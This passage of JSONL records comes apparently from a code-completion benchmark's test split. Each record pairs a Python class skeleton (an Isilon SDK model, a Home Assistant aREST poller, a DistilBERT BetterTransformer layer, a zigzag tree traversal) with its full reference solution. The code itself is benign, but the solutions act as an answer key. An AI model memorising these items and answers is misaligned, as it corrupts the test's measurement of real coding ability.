mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\n\nMethod signatures and docstrings:\n- def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None): Constructor for the IsilonProtectionSource class\n- def from_dictionary(cls, dictionary): Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\n\n<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n<|end_body_0|>\n\n<|body_start_1|>\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n<|end_body_1|>\n", "revision_id": "e4973dfeb836266904d0369ea845513c7acf261e", "skeleton": "<|skeleton|>\nclass IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. 
mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n <|body_0|>\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. Returns: object: An instance of this structure class.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class IsilonProtectionSource:\n \"\"\"Implementation of the 'IsilonProtectionSource' model. Specifies a Protection Source in Isilon OneFs environment. Attributes: access_zone (IsilonAccessZone): Specifies an access zone in an Isilon OneFs file system. This is set only when the entity type is 'kZone'. cluster (IsilonCluster): Specifies information of an Isilon OneFs Cluster. This is set only when the entity type is 'kCluster'. mount_point (IsilonMountPoint): Specifies information about a mount point in an Isilon OneFs file system. This is set only when the entity type is 'kMountPoint'. name (string): Specifies a unique name of the Protection Source. mtype (TypeIsilonProtectionSourceEnum): Specifies the type of the entity in an Is\"\"\"\n\n def __init__(self, access_zone=None, cluster=None, mount_point=None, name=None, mtype=None):\n \"\"\"Constructor for the IsilonProtectionSource class\"\"\"\n self.access_zone = access_zone\n self.cluster = cluster\n self.mount_point = mount_point\n self.name = name\n self.mtype = mtype\n\n def from_dictionary(cls, dictionary):\n \"\"\"Creates an instance of this model from a dictionary Args: dictionary (dictionary): A dictionary representation of the object as obtained from the deserialization of the server's response. The keys MUST match property names in the API description. 
Returns: object: An instance of this structure class.\"\"\"\n if dictionary is None:\n return None\n access_zone = cohesity_management_sdk.models.isilon_access_zone.IsilonAccessZone.from_dictionary(dictionary.get('accessZone')) if dictionary.get('accessZone') else None\n cluster = cohesity_management_sdk.models.isilon_cluster.IsilonCluster.from_dictionary(dictionary.get('cluster')) if dictionary.get('cluster') else None\n mount_point = cohesity_management_sdk.models.isilon_mount_point.IsilonMountPoint.from_dictionary(dictionary.get('mountPoint')) if dictionary.get('mountPoint') else None\n name = dictionary.get('name')\n mtype = dictionary.get('type')\n return cls(access_zone, cluster, mount_point, name, mtype)\n", "source": "the_stack_v2_python_sparse", "source_path": "cohesity_management_sdk/models/isilon_protection_source.py", "source_repo": "cohesity/management-sdk-python", "split": "test", "star_events_count": 24} {"blob_id": "40018bf78d0e5152a2446aef1b89ac6e8e35b626", "bodies": ["self._resource = resource\nself._pin = pin\nself.data = {}", "try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\nexcept requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)"], "bodies_text": "<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "class_docstring": "Class for handling the data retrieval for pins.", "class_name": "ArestData", "detected_licenses": ["Apache-2.0"], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000326", "length_bytes": 3418, "license_type": "permissive", "methods": [{"docstring": "Initialize the aREST data object.", "name": "__init__", "signature": "def __init__(self, resource, pin)"}, {"docstring": "Get the latest data from aREST device.", "name": "update", "signature": "def update(self) -> None"}], "n_methods": 2, "prompt": "Implement the Python class `ArestData` described below.\n\nClass description:\nClass for handling the data retrieval for pins.\n\nMethod signatures and docstrings:\n- def __init__(self, resource, pin): Initialize the aREST data object.\n- def update(self) -> None: Get the latest data from aREST device.", "prompted_full_text": "Implement the Python class `ArestData` described below.\n\nClass description:\nClass for handling the data retrieval for pins.\n\nMethod signatures and docstrings:\n- def __init__(self, resource, pin): Initialize the aREST data 
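# Hedged sketch of the from_dictionary pattern in IsilonProtectionSource
# above: optional nested models hydrate recursively, scalars pass through.
# ChildModel/ParentModel are stand-ins for the IsilonAccessZone/IsilonCluster/
# IsilonMountPoint hierarchy; the @classmethod decorator is assumed from the
# cls-based signature in the record.
class ChildModel:
    def __init__(self, value=None):
        self.value = value

    @classmethod
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        return cls(dictionary.get('value'))

class ParentModel:
    def __init__(self, child=None, name=None, mtype=None):
        self.child = child
        self.name = name
        self.mtype = mtype

    @classmethod
    def from_dictionary(cls, dictionary):
        if dictionary is None:
            return None
        # The JSON key 'type' maps to the attribute 'mtype', mirroring the
        # record above (where 'type' would shadow the builtin).
        child = ChildModel.from_dictionary(dictionary.get('child')) if dictionary.get('child') else None
        return cls(child, dictionary.get('name'), dictionary.get('type'))

m = ParentModel.from_dictionary({'name': 'src1', 'type': 'kCluster', 'child': {'value': 42}})
assert m.mtype == 'kCluster' and m.child.value == 42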
object.\n- def update(self) -> None: Get the latest data from aREST device.\n\n<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n self._resource = resource\n self._pin = pin\n self.data = {}\n<|end_body_0|>\n\n<|body_start_1|>\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n<|end_body_1|>\n", "revision_id": "80caeafcb5b6e2f9da192d0ea6dd1a5b8244b743", "skeleton": "<|skeleton|>\nclass ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n <|body_0|>\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class ArestData:\n \"\"\"Class for handling the data retrieval for pins.\"\"\"\n\n def __init__(self, resource, pin):\n \"\"\"Initialize the aREST data object.\"\"\"\n self._resource = resource\n self._pin = pin\n self.data = {}\n\n def update(self) -> None:\n \"\"\"Get the latest data from aREST device.\"\"\"\n try:\n response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)\n self.data = {'state': response.json()['return_value']}\n except requests.exceptions.ConnectionError:\n _LOGGER.error(\"No route to device '%s'\", self._resource)\n", "source": "the_stack_v2_python_sparse", "source_path": "homeassistant/components/arest/binary_sensor.py", "source_repo": "home-assistant/core", "split": "test", "star_events_count": 35501} {"blob_id": "a02aae8b0ad9829c94253ecbd7d633c80ff9b73a", "bodies": ["super().__init__(config)\nself.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\nself.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\nself.out_proj_weight = bert_layer.attention.out_lin.weight\nself.out_proj_bias = bert_layer.attention.out_lin.bias\nself.linear1_weight = bert_layer.ffn.lin1.weight\nself.linear1_bias = bert_layer.ffn.lin1.bias\nself.linear2_weight = bert_layer.ffn.lin2.weight\nself.linear2_bias = bert_layer.ffn.lin2.bias\nself.norm1_eps = bert_layer.sa_layer_norm.eps\nself.norm1_weight = bert_layer.sa_layer_norm.weight\nself.norm1_bias = bert_layer.sa_layer_norm.bias\nself.norm2_eps = bert_layer.output_layer_norm.eps\nself.norm2_weight = bert_layer.output_layer_norm.weight\nself.norm2_bias = bert_layer.output_layer_norm.bias\nself.num_heads = bert_layer.attention.n_heads\nself.embed_dim = bert_layer.attention.dim\nself.is_last_layer = False\nself.validate_bettertransformer()", "super().forward_checker()\nif x.is_nested:\n attn_mask = None\nif attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = 
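# Hedged sketch of the polling pattern in ArestData above: GET the pin
# endpoint with a timeout, cache the parsed state, and swallow connection
# errors so a flaky device does not crash the update loop. PinPoller and the
# URL are illustrative stand-ins. Note: requests.exceptions.ReadTimeout is
# not a ConnectionError, so a slow (rather than unreachable) device would
# still raise out of update() as written in the record.
import logging
import requests

_LOGGER = logging.getLogger(__name__)

class PinPoller:
    def __init__(self, resource, pin):
        self._resource = resource
        self._pin = pin
        self.data = {}

    def update(self):
        try:
            response = requests.get(f'{self._resource}/digital/{self._pin}', timeout=10)
            self.data = {'state': response.json()['return_value']}
        except requests.exceptions.ConnectionError:
            _LOGGER.error("No route to device '%s'", self._resource)

poller = PinPoller('http://192.0.2.10', pin=4)  # placeholder RFC 5737 address
# poller.update()  # on an unreachable device this logs the error and
#                  # leaves poller.data unchanged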
torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\nx = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\nif x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\nreturn (x,)"], "bodies_text": "<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n<|end_body_1|>\n", "class_docstring": "", "class_name": "DistilBertLayerBetterTransformer", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. 
Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000327", "length_bytes": 43670, "license_type": "no_license", "methods": [{"docstring": "A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.", "name": "__init__", "signature": "def __init__(self, bert_layer, config)"}, {"docstring": "This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553", "name": "forward", "signature": "def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_)"}], "n_methods": 2, "original_id": "stack_v2_sparse_classes_30k_train_006256", "prompt": "Implement the Python class `DistilBertLayerBetterTransformer` described below.\n\nClass description:\nImplement the DistilBertLayerBetterTransformer class.\n\nMethod signatures and docstrings:\n- def __init__(self, bert_layer, config): A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. 
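# Hedged sketch of the q/k/v fusion in the __init__ above: three separate
# Linear projections collapse into one packed in-projection by stacking
# their weight matrices row-wise (and biases likewise), so a single matmul
# produces q, k and v together. Dimensions are illustrative.
import torch
import torch.nn as nn

dim = 8
q_lin, k_lin, v_lin = (nn.Linear(dim, dim) for _ in range(3))
in_proj_weight = nn.Parameter(torch.cat([q_lin.weight, k_lin.weight, v_lin.weight]))
in_proj_bias = nn.Parameter(torch.cat([q_lin.bias, k_lin.bias, v_lin.bias]))

x = torch.randn(2, dim)
packed = torch.nn.functional.linear(x, in_proj_weight, in_proj_bias)
q, k, v = packed.split(dim, dim=-1)
assert torch.allclose(q, q_lin(x), atol=1e-6)
assert torch.allclose(v, v_lin(x), atol=1e-6)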
Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\n- def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_): This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553", "prompted_full_text": "Implement the Python class `DistilBertLayerBetterTransformer` described below.\n\nClass description:\nImplement the DistilBertLayerBetterTransformer class.\n\nMethod signatures and docstrings:\n- def __init__(self, bert_layer, config): A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\n- def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_): This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\n\n<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n<|end_body_0|>\n\n<|body_start_1|>\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return 
(x,)\n<|end_body_1|>\n", "revision_id": "7e55a422588c1d1e00f35a3d3a3ff896cce59e18", "skeleton": "<|skeleton|>\nclass DistilBertLayerBetterTransformer:\n\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n <|body_0|>\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n <|body_1|>\n\n<|end_skeleton|>", "snapshot_name": "stack_v2_sparse_classes_10k", "snapshot_source_dir": "data/stack_v2_sparse_classes_30k", "solution": "class DistilBertLayerBetterTransformer:\n def __init__(self, bert_layer, config):\n \"\"\"A simple conversion of the Distill-BERTLayer to its `BetterTransformer` implementation. Args: bert_layer (`torch.nn.Module`): The original Distill-BERT Layer where the weights needs to be retrieved.\"\"\"\n super().__init__(config)\n self.in_proj_weight = nn.Parameter(torch.cat([bert_layer.attention.q_lin.weight, bert_layer.attention.k_lin.weight, bert_layer.attention.v_lin.weight]))\n self.in_proj_bias = nn.Parameter(torch.cat([bert_layer.attention.q_lin.bias, bert_layer.attention.k_lin.bias, bert_layer.attention.v_lin.bias]))\n self.out_proj_weight = bert_layer.attention.out_lin.weight\n self.out_proj_bias = bert_layer.attention.out_lin.bias\n self.linear1_weight = bert_layer.ffn.lin1.weight\n self.linear1_bias = bert_layer.ffn.lin1.bias\n self.linear2_weight = bert_layer.ffn.lin2.weight\n self.linear2_bias = bert_layer.ffn.lin2.bias\n self.norm1_eps = bert_layer.sa_layer_norm.eps\n self.norm1_weight = bert_layer.sa_layer_norm.weight\n self.norm1_bias = bert_layer.sa_layer_norm.bias\n self.norm2_eps = bert_layer.output_layer_norm.eps\n self.norm2_weight = bert_layer.output_layer_norm.weight\n self.norm2_bias = bert_layer.output_layer_norm.bias\n self.num_heads = bert_layer.attention.n_heads\n self.embed_dim = bert_layer.attention.dim\n self.is_last_layer = False\n self.validate_bettertransformer()\n\n def forward(self, x, attn_mask, head_mask=None, output_attentions=None, *_):\n \"\"\"This is just a wrapper around the forward function proposed in: https://github.com/huggingface/transformers/pull/19553\"\"\"\n super().forward_checker()\n if x.is_nested:\n attn_mask = None\n if attn_mask is not None:\n attn_mask = attn_mask.bool()\n attn_mask = torch.reshape(attn_mask, (attn_mask.shape[0], attn_mask.shape[-1]))\n seqlen = attn_mask.shape[1]\n lengths = torch.sum(~attn_mask, 1)\n if not all([l == seqlen for l in lengths]):\n x = torch._nested_tensor_from_mask(x, attn_mask)\n attn_mask = None\n x = torch._transformer_encoder_layer_fwd(x, self.embed_dim, self.num_heads, self.in_proj_weight, self.in_proj_bias, self.out_proj_weight, self.out_proj_bias, self.use_gelu, self.norm_first, self.norm1_eps, self.norm1_weight, self.norm1_bias, self.norm2_weight, self.norm2_bias, self.linear1_weight, self.linear1_bias, self.linear2_weight, self.linear2_bias, attn_mask)\n if x.is_nested and self.is_last_layer:\n x = x.to_padded_tensor(0.0)\n return (x,)\n", "source": "the_stack_v2_python_sparse", "source_path": "generated/test_huggingface_optimum.py", "source_repo": "jansel/pytorch-jit-paritybench", "split": "test", "star_events_count": 35} {"blob_id": "0accb919720c716fd15bafaf23c6a1cd96e3316b", "bodies": ["from collections import deque\nif 
root is None:\n return []\nq = deque([root])\nlevel = 0\nresult = []\nwhile q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\nreturn result", "from collections import deque\nif root is None:\n return []\nq = deque([root])\nlevel = 0\nresult = []\nwhile q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\nreturn result"], "bodies_text": "<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "class_docstring": "", "class_name": "Solution", "detected_licenses": [], "format_version": "stack_v2_sparse_python_classes_v1", "full_text": "<|skeleton|>\nclass Solution:\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS with Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_0|>\n\n def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]:\n \"\"\"BFS without Reverse, Time: O(n), Space: O(n)\"\"\"\n <|body_1|>\n\n<|end_skeleton|>\n\n<|body_start_0|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([])\n for _ in range(sz):\n node = q.popleft()\n result[-1].append(node.val)\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n if level % 2 != 0:\n result[-1] = result[-1][::-1]\n level += 1\n return result\n<|end_body_0|>\n\n<|body_start_1|>\n from collections import deque\n if root is None:\n return []\n q = deque([root])\n level = 0\n result = []\n while q:\n sz = len(q)\n result.append([0] * sz)\n for i in range(sz):\n node = q.popleft()\n if level % 2 == 0:\n idx = i\n else:\n idx = sz - i - 1\n result[-1][idx] = node.val\n if node.left:\n q.append(node.left)\n if node.right:\n q.append(node.right)\n level += 1\n return result\n<|end_body_1|>\n", "id": "stack_v2_sparse_classes_10k_test_000328", "length_bytes": 1527, "license_type": "no_license", "methods": [{"docstring": "BFS with Reverse, Time: O(n), Space: O(n)", "name": "zigzagLevelOrder", "signature": "def zigzagLevelOrder(self, root: TreeNode) -> List[List[int]]"}, {"docstring": "BFS without Reverse, Time: O(n), Space: O(n)", "name": "zigzagLevelOrder", "signature": "def 